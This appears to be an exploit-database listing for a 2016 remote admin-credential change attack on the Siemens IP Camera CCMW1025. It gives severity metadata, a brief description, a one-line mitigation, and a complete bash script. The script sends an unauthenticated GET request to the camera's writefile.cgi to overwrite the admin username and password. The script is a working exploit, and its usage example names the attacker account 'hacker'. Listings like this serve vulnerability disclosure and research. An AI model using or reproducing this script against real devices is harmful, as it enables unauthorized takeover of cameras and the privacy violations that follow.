header-logo
Suggest Exploit
vendor:
IP Camera CCMW1025
by:
Todor Donev
8,8
CVSS
HIGH
Remote Code Execution
78
CWE
Product Name: IP Camera CCMW1025
Affected Version From: x.2.2.1798
Affected Version To: x.2.2.1798
Patch Exists: NO
Related CWE: N/A
CPE: h:siemens:ip_camera_ccmw1025
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2016

SIEMENS IP Camera CCMW1025 x.2.2.1798 remote change admin user/password

This exploit allows an attacker to remotely change the admin user and password of a SIEMENS IP Camera CCMW1025 x.2.2.1798 device. The attacker can use the GET command to send a request to the device's CGI-bin/writefile.cgi script with the new user and password parameters. This will allow the attacker to gain access to the device with the new credentials.

Mitigation:

Ensure that the device is not exposed to the public internet and that access to the device is restricted to trusted users.
Source

Exploit-DB raw data:

#!/bin/bash
#
#  SIEMENS IP Camera CCMW1025 x.2.2.1798 remote change admin user/password 
#
#  Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>
#  http://www.ethical-hacker.org/
#  https://www.facebook.com/ethicalhackerorg
#  
#  Disclaimer:
#  This or previous programs is for Educational
#  purpose ONLY. Do not use it without permission.
#  The usual disclaimer applies, especially the
#  fact that Todor Donev is not liable for any
#  damages caused by direct or indirect use of the
#  information or functionality provided by these
#  programs. The author or any Internet provider
#  bears NO responsibility for content or misuse
#  of these programs or any derivatives thereof.
#  By using these programs you accept the fact
#  that any damage (dataloss, system crash,
#  system compromise, etc.) caused by the use
#  of these programs is not Todor Donev's
#  responsibility.
#  
#  Use them at your own risk!
#
#  
 
if [[ $# -gt 4 || $# -lt 3 ]]; then
        echo "  [ SIEMENS IP Camera CCMW1025 x.2.2.1798 remote change admin user/password"
        echo "  [ =================================================="
        echo "  [ Usage: $0 <target> <user> <password> <repeat password>"
        echo "  [ Example: $0 192.168.1.200:80 hacker teflon teflon"
        echo "  ["
        echo "  [ Copyright 2016 (c) Todor Donev  <todor.donev at gmail.com>"
        echo "  [ http://www.ethical-hacker.org/  https://www.facebook.com/ethicalhackerorg "
        exit;
fi
GET=`which GET 2>/dev/null`
if [ $? -ne 0 ]; then
        echo "  [ Error : libwww-perl not found =/"
        exit;
fi
        GET "http://$1/cgi-bin/writefile.cgi?DEFonoff_adm=&Adm_ID=$2&Adm_Pass1=$3&Adm_Pass2=$4&Language=en&Logoff_Time=0&UpSectionName=ADMINID" 0&> /dev/null <&1

Navigation

Suggest Exploit

Services By CQR